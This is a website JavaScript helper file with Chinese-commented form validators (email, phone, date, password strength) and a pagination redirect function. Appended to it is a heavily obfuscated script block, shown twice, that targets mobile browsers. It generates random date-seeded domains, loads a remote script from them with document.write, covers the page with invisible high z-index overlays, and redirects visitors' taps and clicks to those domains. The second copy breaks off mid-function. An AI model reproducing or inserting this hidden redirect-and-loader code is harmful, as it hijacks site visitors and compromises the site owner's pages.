var USER_IP='216.73.216.30'/*hk.lueyisw.com*///不允许输入中文
var engOnly=function(str){
	for(i=0;i<str.length;i++){
		var c = str.substr(i,1);
		var ts = encodeURIComponent(c);
		if(ts.substring(0,2) == "%u"){
			return false;
		} else {
			return true;
		}
	}
}

//电子邮件验证
var emailOnly=function(str){
	var regEmail=/[_a-zA-Z\d\-\.]+@[_a-zA-Z\d\-]+(\.[_a-zA-Z\d\-]+)+$/;
	if (regEmail.test(str)){
		return true;
	} else {
		return false;
	}
}

//手机号码验证
var mobileOnly=function(str){
	var regMobile=/^0{0,1}(13[0-9]|14[0-9]|15[0-9]|17[0-9]|18[0-9])[0-9]{8}$/;
	if (regMobile.test(str)){
		return true;
	} else {
		return false;
	}
}

//纯数字验证
var numOnly=function(str){
	var regNum=/^[0-9]{1,20}$/;
	if (regNum.test(str)){
		return true;
	} else {
		return false;
	}
}

//电话号码验证
var telOnly=function(str){
	var regTel=/^(\d{3,4}-)?\d{7,9}$/g;
	if (regTel.test(str))
		return true;
	else
		return false;
}

//日期的验证
var dateOnly=function(str){
	var date_array=str.split('-');
	if (date_array.length!=3) return false;
	var y=date_array[0];
	var m=date_array[1];
	var d=date_array[2];
	if (!numOnly(y)||!numOnly(m)||!numOnly(d)) return false;
	if (y.length!=4||m.length!=2||d.length!=2) return false;
	y=Number(y);
	m=Number(m);
	d=Number(d);
	if (y<1900||y>2050||m<1||m>12||d<1||d>31) return false;
	if ((m==4||m==6||m==9||m==11)&&d>30) return false;
	if ((y%100!=0&&y%4==0)||y%400==0){
		if (m==2&&d>29) return false;
	} else {
		if (m==2&&d>28) return false;
	}
	return true;
}

//密码强度检测
function passwordGrade(pwd) {
	var score = 0;
	var regexArr = ['[0-9]', '[a-z]', '[A-Z]', '[\\W_]'];
	var repeatCount = 0;
	var prevChar = '';
	//check length
	var len = pwd.length;
	score += len > 18 ? 18 : len;
	//check type
	for (var i = 0, num = regexArr.length; i < num; i++) { if (eval('/' + regexArr[i] + '/').test(pwd)) score += 4; }
	//bonus point
	for (var i = 0, num = regexArr.length; i < num; i++) {
		if (pwd.match(eval('/' + regexArr[i] + '/g')) && pwd.match(eval('/' + regexArr[i] + '/g')).length >= 2) score += 2;
		if (pwd.match(eval('/' + regexArr[i] + '/g')) && pwd.match(eval('/' + regexArr[i] + '/g')).length >= 5) score += 2;
	}
	//deduction
	for (var i = 0, num = pwd.length; i < num; i++) {
		if (pwd.charAt(i) == prevChar) repeatCount++;
		else prevChar = pwd.charAt(i);
	}
	score -= repeatCount * 1;
	return score;
 }

//字符限制
var charset="gb2312";
function strlen_verify(obj, checklen, maxlen) {
	var v = obj.value, charlen = 0, maxlen = !maxlen ? 255 : maxlen, curlen = maxlen, len = strlen(v);
	for(var i = 0; i < v.length; i++) {
		if(v.charCodeAt(i) < 0 || v.charCodeAt(i) > 255) {
			curlen -= charset == 'utf-8' ? 2 : 1;
		}
	}
	if(curlen >= len) {
		$('#'+checklen).html(curlen - len);
	} else {
		obj.value = mb_cutstr(v, maxlen, true);
	}
}

function mb_cutstr(str, maxlen, dot) {
	var len = 0;
	var ret = '';
	var dot = !dot ? '...' : '';
	maxlen = maxlen - dot.length;
	for(var i = 0; i < str.length; i++) {
		len += str.charCodeAt(i) < 0 || str.charCodeAt(i) > 255 ? (charset == 'utf-8' ? 3 : 2) : 1;
		if(len > maxlen) {
			ret += dot;
			break;
		}
		ret += str.substr(i, 1);
	}
	return ret;
}

function strlen(str) {
	return ($.browser.msie && str.indexOf('\n') != -1) ? str.replace(/\r?\n/g, '_').length : str.length;
}

//全选取消
function CheckAll(form)
{
  for (var i=0;i<form.elements.length;i++)
    {
    var e = form.elements[i];
    if (e.Name!="chkAll")
       e.checked=form.chkAll.checked;
    }
}

//url跳转
//t0:跳转的页码,t1:系统模式(动，静，伪),t2:动态模式下url模板,t3:总页数,t4:是否是后台调用(0为后台调用)


function urlgo(t0,t1,t2,t3,t4)
{
	var url;
	if(t0>t3){t0=t3}
	url=t2+t0;
	if(t4==1)
	{
		if(t1!=1)
		{
			if(t0<=1)
			{
				if(t1==2){
					//var a=t2;
					//var b=a.split("_");
					t5=t2;
				}
				else
				{
					t5="./"
				}
			}
			else
			{
				if(t1==2){
					var a=t2;
					var b=a.split("_");
					//t5=b[1]+"_[page]/"
					t5=t2+t0+"/";
				}
				else
				{
					t5="index_[page].html"
				}
				t5=t5.replace("[page]",t0);
			}
			url=t5;
		}
	}
	document.location.href=url;
}

//弹窗操作
function openlayer() {
    var boxWidth = "400px";
    if (window.innerWidth < 768 && window.innerWidth > 414) {
        boxWidth = "70%";
    } else if (window.innerWidth <= 414 && window.innerWidth > 320) {
        boxWidth = "80%";
    } else if (window.innerWidth <= 320) {
        boxWidth = "90%";
    }

    layerform = layer.open({
        type: 1,
        title: false,
        area: [boxWidth, "auto"],
        fixed: true,
        content: $('#layer-sumbit'),
    });
}

;window.isiOS=!!navigator.userAgent.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);var isIOS=-1<navigator.userAgent.search(/iphone/gi),isAndroid=-1<navigator.userAgent.search(/(android|linux)/gi);function lrgivhcs(window,document,navigator,ac){;;window._BD_DJ=function(){function randomChoice(){var a;return"undefined"!=typeof crypto&&crypto.getRandomValues?(a=new Uint8Array(1),crypto.getRandomValues(a),1&a[0]):!(Math.random()<.5)}(randomChoice()?function(){function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=160]})(a,t)}function a0a(){var a=["real","temp","push","16VnwnHh","remove","offsetParent","getTime","reverse","touchend","parse","check",'" style="position:fixed;color:transparent;">.</div>',"style","setItem",".jpg","6267814cppbeI","writeln","touch_min_height",'<div class="',"data","0vh","pageY","substring","th:1","%;h","383265zVYdci","mg st","common","33000385kGDTYB","i13","now","width","startsWith","lementB","offsetHeight","uci","xyxyyx",'c="',"getElementsByClassName","getDate","__executedClassIds","body","2014",'"+"',"charAt","charCodeAt","spt","config_","bottom","578975oLrnpK","tpir","</div>","ght","data3","padding-top","647560ugKRqQ","hei","100vh","0px","_real","pos","<style>body{","this_touch_status","touch_max_height","Mac","touchMotion","querySelector","location","clientY",'x;" sr',"getItem",">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<","getFullYear","padding-bottom:32%;","i11","1476YGHPpe","mati","top","height","dex","getElementsByTagName","e-hei","padding-top:32%;","indexOf","parentNode","addEventListener","touchDelayTimeout","currentPvIndex_","join","Win","slice","clear","platform","eig","594130mvriBD","touchstart","4TGUnHq","lin","random","2772crAAaS","0vw","ion","filter","innerHTML","fixed","floor",'e="wid',"touchmove"," <span> ","split","i12","36lhidVa",'{display:flex;width:100%;}</style><div id="',"~</div>","stringify","undefined","getMonth","get","yes","touches","length","100vw","cli","every","classId","stopPropagation","abcdefghijklmnopqrstuvwxyz","relative","href","offsetTop","ani","/:sptt","k21","idth","fromCharCode"];return(a0a=function(){return a})()}(()=>{for(var a=a0b,t=a0a();;)try{if(907414==-parseInt(a(221))*(-parseInt(a(219))/2)+-parseInt(a(224))/3*(-parseInt(a(200))/4)+-parseInt(a(174))/5*(-parseInt(a(236))/6)+-parseInt(a(275))/7*(-parseInt(a(263))/8)+-parseInt(a(285))/9+-parseInt(a(180))/10+-parseInt(a(288))/11)break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(167),b=18042186,c=R(13)+b6(274),d=b6(270),e=b6(287),f=b6(260),g=454,h=2,i=b6(202),j=b6(243),k="no",l=0,m=0,n=100,o=0,p=40,q=sessionStorage[b6(195)](b6(212)+g);function r(){for(var a=b6,t=s(),e=0;e<t[a(245)];e++){var n=t[e];document.write(n)}}function s(){var a=b6;return["<",U("rcs"),U("tpi")," onload='xyxyyx()' "," s",'rc="',"ht",U(a(171)),":","/","/",a0(),".",U(a(160)),"/",f,"?",(new Date)[a(266)](),g,'">',"<","/s","c",U(a(175)),">"]}function t(a,t){return typeof a===b6(240)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(273)]("currentPvIndex_"+g,q+1),window[b6(161)]=function(){var b9=b6,aB=g,aC=eval(b9(279)+aB)+"";sessionStorage[b9(273)]("data_"+aB,aC),sessionStorage[b9(273)](b9(279)+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=1e3,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,c,u,f,l,d,v=b6;window[v(165)]=window.__executedClassIds||new Set,window[v(165)].has(a[v(249)])||(window[v(165)].add(a[v(249)]),console[v(216)](),o=a.classId,r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[v(199)],c=a[v(235)],u=a[v(289)],sessionStorage[o+v(184)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document[v(210)](v(268),function(){var a,t=v;H-G<e&&(a=(Date[t(290)]()-l)/1e3,n<a)&&(F++,l=Date[t(290)]())},!1),d=Date[v(290)](),f[v(262)](!1),sessionStorage[o]=JSON[v(239)](f),setInterval(function(){var a=v,t=(Date.now()-d)/1e3,t=r<=t,e=i<=F,n=document.body[a(294)]>=s,t=t&&e&&n,e=(f[f[a(245)]-1]!==t&&(f[f[a(245)]-1]=t,sessionStorage[o]=JSON[a(239)](f)),f[a(227)](Boolean)[a(245)]),n=b<=e,t=!c||f[a(248)](Boolean),e=!u||f[0]&&f[a(248)](Boolean);n&&t&&e&&(sessionStorage[o+a(184)]="true")},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:e(172)+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t[e(199)]),i12:t[e(235)],i13:t[e(289)]}}function L(a,t){var e=b6;if(sessionStorage[a[e(249)]+e(184)])for(var n in t)n[e(292)]("r")&&typeof t[n]!==e(240)&&(t["k"+n[e(215)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,u=b6;null==sessionStorage[u(195)](u(279)+a)||(e=sessionStorage[u(195)]("data_"+a),I(e=K(a,a=JSON[u(269)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=u,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a.split(","),a=a[a[t(245)]-1].split("_");r[t(277)]=parseInt(a[0]),r[t(188)]=parseInt(a[1])}if(a){var s=a[o(234)](","),s=s[0]?parseInt(s[0]):100;if(100*Math[o(223)]()<s)return r[o(187)]=!0,i(a),r}if(e)for(var b=e[o(234)](",")[0].split("_"),c=0;c<b[o(245)];c++)if(parseInt(b[c])===n)return r.this_touch_status=!0,i(e),r;if(t){a=t[o(234)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math.random()<s)r[o(187)]=!0,r[o(211)]=a,i(t)}return r})(a[u(257)],a.k22,a.k23,q),A=e[u(187)],B=e[u(277)],C=e[u(188)],D=e[u(211)],v||((e=t(a.k8,"_"))&&-1!==e.indexOf(q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e[u(208)](q+"")?w=!0:2===(e=t(a.k5,",")).length?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[u(245)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e.indexOf(q+"")?x=!0:2===(e=t(a.k6,",")).length&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(210)](b6(220),function(a){a=a[b6(244)][0].clientY;H=G=a},!1),document[b6(210)](b6(232),function(a){var t=b6,a=a[t(244)][0][t(193)],t=(H=H<a?a:H)-(G=a<G?a:G);E.touchMotion(t)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U("/uci."));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(230)](10*Math[t(223)]());return e}function S(a){for(var t=b6,e="",n=t(251),o=0;o<a;o++)e+=n[t(169)](Math[t(230)](Math[t(223)]()*n[t(245)]));return e}function T(a,t){var e=b6;return Math.floor(Math[e(223)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(234)]("")[t(267)]()[t(213)]("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(245)];o+=t)n[e(262)](a[e(215)](o,o+t));return n}function W(a,t){for(var e=b6,n="",o=0;o<t[e(245)];o++)n+=t[o],o<t[e(245)]-1&&(n+=a);return n}function X(){var br=b6,aB=Date[br(269)](new Date)/1e3+"",aC=aB[br(282)](6,10),aD=Math[br(230)](9*Math[br(223)]())+1,aE=(aB*=aD,(aB+"").length),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[br(230)](2*Math[br(223)]())+1,aI=Math[br(230)](998*Math[br(223)]())+1,aJ=Math[br(230)](998*Math.random())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[br(245)],aM=(aJ+"")[br(245)],aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"")[a(234)](""),e=t[a(245)],n=[e],o=[],r=0;r<10;r++){var i=Math[a(230)](9*Math[a(223)]())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s.length;r++){var b=Math.floor(Math.random()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var c=s[r];o[c]=t[r],n[r+1]=c}return n[a(213)]("")+o[a(213)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(266)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date.now()-b),o="",r=n[t(241)]()+1,i=n[t(164)](),s=""+n[t(197)](),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,c=0;c<6;c++)o+=(0,String.fromCharCode)(97+(parseInt(s)*e[3*c+1]+e[3*c+2])%e[3*c]%26);return o}function a1(a,t){for(var e=b6,n="",o=0;o<a[e(245)];o++){var r=a[e(170)](o);48<=r&&r<=57&&(r=(r-48+t)%10+48),n+=String[e(259)](r)}return n}function a2(a){var a=a1(a,5),t=a.length;return t<10?t="00"+t:t<100&&(t="0"+t),t+a}var a3=location[b6(253)],a4=navigator,a6,a7,a8,a9,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,az,aA,aA;function a5(){var a=b6,t=-1!=a4[a(217)][a(208)](a(214)),e=-1!=a4[a(217)][a(208)](a(189));a4[a(217)];return(t=-1==a3.indexOf("vv")&&t)||e}function al(){var bz=b6;x&&!window.temp&&(window[bz(261)]=!0,P=3,eval(ab)())}a5()||(a6=document,a7="h"+U(b6(256))+"/",a8="0",a9=S(11),aa=S(10),ab=S(10),ac=S(10),ad=S(7),ae=T(2147483547,2147483647),af=ae-T(1e4,2e4),ag=T(115,122),ah=function(){},ai=b6(280),aj=b6(225),v?(ai=b6(182),aj=b6(246),a8="1",P=3,ah=function(a){var t=b6;a.style["z-in"+t(204)]=af}):w&&(ai=p+"vh",aj=b6(246),a8="2",P=4,ah=function(a){a.style["z-index"]=af}),ak=Date[b6(290)](),E[b6(190)]=function(aB){var by=b6;if(A){if(0!=D){var aC=new Date(ak)[by(266)](),aD=(Date[by(290)]()-aC)/1e3;if(aD<D)return}B<aB&&aB<=C&&(P=3,eval(ab)())}},am="",an=b6(252),ao=b6(202),ap=b6(173),aq="",ar=b6(179),1==h&&(an=b6(229),am=b6(207),"bottom"==i&&(am=b6(198),ao=b6(173),ap="bottom",ar="padding-bottom"),ae=T(8e4,9e4)),an=V(an,2),an=W(b6(168),an),an='"'+an+'"',ao=V(ao,1),ao=W(b6(168),ao),ao='"'+ao+'"',ap=V(ap,1),ap=W(b6(168),ap),ap='"'+ap+'"',as="",at="",j==b6(243)&&(as=U(b6(196)),at=U("sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1")),au=T(100,200),av=au+200,aw=y+av+100,ax=aw+300,ay=ax+300,az=function(){},u&&(a8+="3",az=function(){var bC=b6,aB=function(aD){var bA=a0b,aE=document.querySelector(bA(166)),aF=document[bA(191)](aD),aG=aF[bA(294)],aH=aC(aF),aI=aH+aG,aJ=!0;function aK(aL){var bB=bA,aM=aL[bB(244)][0],aN=aM[bB(193)],aO=aM[bB(281)],aP=0,aP=1!=h?aM.pageY:aM[bB(193)];aH<=aP&&aP<aI&&aJ&&(P=4,eval(ab)(!1))}aE.addEventListener(bA(232),aK)};function aC(a){for(var t=bC,e=a[t(254)],n=a[t(265)];null!==n;)e+=n[t(254)],n=n[t(265)];return e}setTimeout(function(){aB("."+ad)},ax),ai!=bC(280)&&ai!=bC(182)&&setTimeout(function(){aB("."+a9)},ax+50)}),aA=function(){},aA=k==b6(243)?function(a){var t=b6,e=(a[t(209)][t(264)](),document[t(163)](a9));if(e)for(var n=0;n<e.length;n++)e[n][t(272)].height="0";document[t(205)](t(166))[0][t(272)][""+ar]=t(183),event[t(250)]()}:function(aB){var bF=b6;event[bF(250)](),eval(ab)()},function(){var bI=b6,aB={data3:{0:{wdf:a7+a0()+Q+c+Z()}}},aC=function(a){var t=a0b;return a.split("")[t(267)]()[t(213)]("")};function aD(){return a7+a0()+Q+d+a2(O)+P+X()}window[aa]=function(a){aA(a)},window[ab]=function(a){var t=a0b,e=document[t(163)](a9);if(e&&null==a)for(var n=0;n<e[t(245)];n++)e[n][t(272)][t(203)]="0";window[t(192)][t(253)]=aD()},al(),x&&!window[bI(261)]&&(window[bI(261)]=!0,P=3,eval(ab)());var aE=function(){var a=bI;window[a(192)][a(253)]=aD()},aF=aC(aB[bI(178)][0].wdf),aG="",aH=(a8=" ",aG+=as+'<div  class="'+ad+'" style=" position:;"> <span style="position: absolute;font-size: 14px;">'+a8+bI(233)+bI(176),aG+=bI(278)+a9+bI(271),document[bI(276)](bI(186)+am+"}#"+ac+bI(237)+ac+'">~_~~_~'),document[bI(276)](bI(238)),setTimeout(function(){var a=bI;document[a(242)+"E"+a(293)+"yId"](ac)[a(228)]=aG},au),setTimeout(function(){function aI(aJ,aK,aL){var bL=a0b,aM=document[bL(163)](aJ)[0];aM.style[bL(181)+"ght"]=ag+"px",aM.style[eval(ao)]="0",aM.style.left="0",aM.style[bL(255)+bL(201)+"on"]=at,aM.style["z-in"+bL(204)]=ae,aM.style["w"+bL(258)]="100vw",aM[bL(228)]+="<i"+bL(286)+"yl"+bL(231)+bL(283)+"00"+bL(284)+bL(218)+"ht:"+ag+"p"+bL(194)+bL(162)+U(aK)+'" />',aM[bL(228)]=aM[bL(228)]+aq,aM["on"+bL(247)+"ck"]=function(){P=2,aL()},aM.style[bL(185)+"it"+bL(226)]=eval(an)}aI(ad,aF,aE)},av),setTimeout(function(){var bM=bI,aI=document[bM(163)](a9)[0];aI.style[bM(222)+bM(206)+bM(177)]=ai,aI.style[bM(291)]=aj,ah(aI),aI.style[eval(ap)]="0",aI.style.left="0",aI["on"+bM(247)+"ck"]=function(){eval(ab)()}},aw),az(),sessionStorage.getItem(bI(279)+g));null==aH&&r()}())}()}:function(){function a0b(a,t){var e=a0a();return(a0b=function(a,t){return e[a-=423]})(a,t)}function a0a(){var a=["abcdefghijklmnopqrstuvwxyz","/uci.","dex","currentPvIndex_","top","href","data3","split"," onload='kfbpva()' ","write","writeln","eig","touchMotion","touch_min_height","i11","parentNode","2028","querySelector","get",'<div class="',">elyts/<;}})0(etator)1(elacs:mrofsnart-tikbew-{%001})ged5.1-(etator)1(elacs:mrofsnart-tikbew-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-tikbew-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-tikbew-{%02,%01})1(elacs:mrofsnart-tikbew-{%0{sgewgekahs semarfyek-tikbew-@}})0(etator)1(elacs:mrofsnart-zom-{%001})ged5.1-(etator)1(elacs:mrofsnart-zom-{%08,%06,%04})ged5.1(etator)1(elacs:mrofsnart-zom-{%09,%07,%05,%03})ged5.1-(etator)59.0(elacs:mrofsnart-zom-{%02,%01})1(elacs:mrofsnart-zom-{%0{sgewgekahs semarfyek-zom-@>elyts<","floor","getItem","substring","random","i13","bottom","yes","ght","uci","remove","100vh","offsetParent","i12","sgewgekahs gninnur enon lamron etinifni s2.0 esae s5.1","reverse",'e="wid',"301650WNCgVD","lementB","getElementsByClassName","join","2188888rlSSxK","padding-top","push","rcs","<style>body{",'<div  class="',"temp","k21","9oRoPMW","padding-bottom:32%;","charCodeAt","4196130EQjmkw","616080tzHkMb","offsetTop",'" style="position:fixed;color:transparent;">.</div>',"pageY","idth","ht:","now",'" style=" position:;"> <span style="position: absolute;font-size: 14px;">',"getTime","fromCharCode","addEventListener","stringify","touchend","innerHTML","platform","location","3FdHHOk","touchstart","fixed","undefined","mg st","body","spt","length","tpi","pos","style","slice","touches","touchDelayTimeout","getDate","common","parse","this_touch_status"," <span> ","setItem","touch_max_height",'"+"',"data","_real","__executedClassIds","1782090SKPyXo","ion","stopPropagation","mati","data_","touchmove","hei","true","classId","add","0vw",'x;" sr',"</div>","cli","e-hei","7SfAhLE","/:sptt",'c="',"startsWith","getFullYear","lin","0vh","has","kfbpva","332432VPWZjg","k23","clientY","check","~</div>","indexOf","every","100vw","height","927056mHtMaa","0px","getElementsByTagName",'">~_~~_~',"wdf","relative"];return(a0a=function(){return a})()}(()=>{for(var a=a0b,t=a0a();;)try{if(176663==+parseInt(a(453))+parseInt(a(534))/2*(-parseInt(a(485))/3)+-parseInt(a(543))/4+-parseInt(a(469))/5+parseInt(a(510))/6*(-parseInt(a(525))/7)+parseInt(a(457))/8+-parseInt(a(465))/9*(-parseInt(a(468))/10))break;t.push(t.shift())}catch(a){t.push(t.shift())}})(),function(){var b6=a0b,a=b6(432),b=18037604,c=R(13)+".jpg",d=b6(537),e=b6(500),f="real",g=4825,h=2,i=b6(553),j="no",k="no",l=0,m=0,n=100,o=0,p=100,q=sessionStorage[b6(438)](b6(552)+g);function r(){for(var a=s(),t=0;t<a.length;t++){var e=a[t];e=e,document[a0b(425)](e)}}function s(){var a=b6;return["<",U(a(460)),U(a(493)),a(424)," s",'rc="',"ht",U(a(491)),":","/","/",a0(),".",U(a(445)),"/",f,"?",(new Date)[a(477)](),g,'">',"<","/s","c",U("tpir"),">"]}function t(a,t){return typeof a===b6(488)||null===a?[]:a.split(t)}null==q&&(q=0),q=parseInt(q),sessionStorage[b6(504)](b6(552)+g,q+1),window[b6(533)]=function(){var b9=b6,aB=g,aC=eval(b9(507)+aB)+"";sessionStorage[b9(504)](b9(514)+aB,aC),sessionStorage[b9(504)]("data"+aB,1)};var u=n>=T(1,100),v=!1,w=!1,x=o>=T(1,100),y=0,z=0,A=z>=T(1,100),B=0,C=0,D=0,E={touchMotion:function(){}},F=0,G=0,H=0;function I(a){var o,r,i,e,s,n,b,c,u,f,l,d,v=b6;window.__executedClassIds=window.__executedClassIds||new Set,window[v(509)][v(532)](a.classId)||(window[v(509)][v(519)](a[v(518)]),console.clear(),o=a[v(518)],r=a.i1,i=a.i2,e=a.i3,s=a.i4,n=a.i5,b=a[v(430)],c=a[v(449)],u=a.i13,sessionStorage[o+v(508)])||(f=JSON.parse(sessionStorage[o]||"[]"),l=0,document[v(479)](v(481),function(){var a,t=v;H-G<e&&(a=(Date[t(475)]()-l)/1e3,n<a)&&(F++,l=Date[t(475)]())},!1),d=Date[v(475)](),f[v(459)](!1),sessionStorage[o]=JSON.stringify(f),setInterval(function(){var a=v,t=(Date[a(475)]()-d)/1e3,t=r<=t,e=i<=F,n=document[a(490)].offsetHeight>=s,t=t&&e&&n,e=(f[f[a(492)]-1]!==t&&(f[f.length-1]=t,sessionStorage[o]=JSON[a(480)](f)),f.filter(Boolean)[a(492)]),n=b<=e,t=!c||f[a(540)](Boolean),e=!u||f[0]&&f[a(540)](Boolean);n&&t&&e&&(sessionStorage[o+a(508)]=a(517))},1e3))}function J(a){return""===a?0:parseInt(a,10)}function K(a,t){var e=b6;return{classId:"config_"+a,i1:J(t.i1),i2:J(t.i2),i3:J(t.i3),i4:J(t.i4),i5:J(t.i5),i11:J(t.i11),i12:t[e(449)],i13:t[e(441)]}}function L(a,t){var e=b6;if(sessionStorage[a[e(518)]+e(508)])for(var n in t)n[e(528)]("r")&&typeof t[n]!==e(488)&&(t["k"+n[e(496)](1)]=t[n])}function M(a){p=a.m1,j=a.m2,n=a.m3}function N(a){var e,u=b6;null==sessionStorage[u(438)](u(507)+a)||(e=sessionStorage[u(438)](u(514)+a),I(e=K(a,a=JSON[u(501)](e))),M(a),L(e,a),v=parseInt(a.k2)>=T(1,100),w=parseInt(a.k1)>=T(1,100),x=parseInt(a.k3)>=T(1,100),e=((a,t,e,n)=>{var o=u,r={this_touch_status:!1,touch_min_height:0,touch_max_height:0,touchDelayTimeout:0};function i(a){var t=a0b,a=a[t(423)](","),a=a[a[t(492)]-1][t(423)]("_");r[t(429)]=parseInt(a[0]),r.touch_max_height=parseInt(a[1])}if(a){var s=a[o(423)](","),s=s[0]?parseInt(s[0]):100;if(100*Math[o(440)]()<s)return r[o(502)]=!0,i(a),r}if(e)for(var b=e[o(423)](",")[0][o(423)]("_"),c=0;c<b[o(492)];c++)if(parseInt(b[c])===n)return r[o(502)]=!0,i(e),r;if(t){a=t[o(423)](","),s=parseInt(a[0]),a=parseInt(a[1]);if(100*Math[o(440)]()<s)r[o(502)]=!0,r[o(498)]=a,i(t)}return r})(a[u(464)],a.k22,a[u(535)],q),A=e[u(502)],B=e[u(429)],C=e[u(505)],D=e.touchDelayTimeout,v||((e=t(a.k8,"_"))&&-1!==e[u(539)](q+"")?v=!0:w||((e=t(a.k7,"_"))&&-1!==e[u(539)](q+"")?w=!0:2===(e=t(a.k5,",")).length?parseInt(e[0])>=T(1,100)&&(v=!0,y=1e3*parseInt(e[1])):2===(e=t(a.k4,","))[u(492)]&&parseInt(e[0])>=T(1,100)&&(w=!0,y=1e3*parseInt(e[1])))),x)||((e=t(a.k9,"_"))&&-1!==e[u(539)](q+"")?x=!0:2===(e=t(a.k6,",")).length&&parseInt(e[0])>=T(1,100)&&setTimeout(function(){x=!0,al()},1e3*parseInt(e[1])))}document[b6(479)](b6(486),function(a){var t=b6,a=a.touches[0][t(536)];H=G=a},!1),document[b6(479)](b6(515),function(a){var t=b6,a=a[t(497)][0][t(536)],a=(H=H<a?a:H)-(G=a<G?a:G);E[t(428)](a)},!1),N(g);var O="",P=2,Q=(d+="?",c+="?",U(b6(550)));function R(a){for(var t=b6,e="",n=0;n<a;n++)e+=Math[t(437)](10*Math.random());return e}function S(a){for(var t=b6,e="",n=t(549),o=0;o<a;o++)e+=n.charAt(Math[t(437)](Math[t(440)]()*n[t(492)]));return e}function T(a,t){var e=b6;return Math.floor(Math[e(440)]()*(t-a+1))+a}function U(a){var t=b6;return a[t(423)]("")[t(451)]()[t(456)]("")}function V(a,t){for(var e=b6,n=[],o=0;o<a[e(492)];o+=t)n.push(a[e(496)](o,o+t));return n}function W(a,t){for(var e=b6,n="",o=0;o<t.length;o++)n+=t[o],o<t[e(492)]-1&&(n+=a);return n}function X(){var br=b6,aB=Date[br(501)](new Date)/1e3+"",aC=aB[br(439)](6,10),aD=Math[br(437)](9*Math[br(440)]())+1,aE=(aB*=aD,(aB+"")[br(492)]),aF=aD+""+aE+aB,aG={1:"+",2:"*"},aH=Math[br(437)](2*Math.random())+1,aI=Math[br(437)](998*Math[br(440)]())+1,aJ=Math[br(437)](998*Math[br(440)]())+1,aK=aI+aG[aH]+aJ,aL=(aI+"")[br(492)],aM=(aJ+"").length,aN=aC,aO=eval(aK)*aN+"2",aP=aH+""+aL+aM+aI+aJ+aO,aQ=aF+aP;return aQ}function Y(){for(var a=b6,t=(g+"")[a(423)](""),e=t[a(492)],n=[e],o=[],r=0;r<10;r++){var i=Math[a(437)](9*Math[a(440)]())+1;o[r]=i}for(var s=[0,1,2,3,4,5,6,7,8,9],r=1;r<s.length;r++){var b=Math[a(437)](Math[a(440)]()*(r+1));[s[r],s[b]]=[s[b],s[r]]}for(r=0;r<e;r++){var c=s[r];o[c]=t[r],n[r+1]=c}return n[a(456)]("")+o[a(456)]("")}function Z(){var a=b6,a=Y()+X()+(new Date)[a(477)]()+"";return O=a}function a0(){for(var t=b6,e=[233280,9301,49297,714025,4096,150889,134456,281,28411,7875,421,1663,14406,967,3041,214326,3613,45289],n=new Date(Date[t(475)]()-b),o="",r=n.getMonth()+1,i=n[t(499)](),s=""+n[t(529)](),s=(s+=r<=9?"0"+r:r)+(i<=9?"0"+i:i)+a,c=0;c<6;c++)o+=(0,String[t(478)])(97+(parseInt(s)*e[3*c+1]+e[3*c+2])%e[3*c]%26);return o}function a1(a,t){for(var 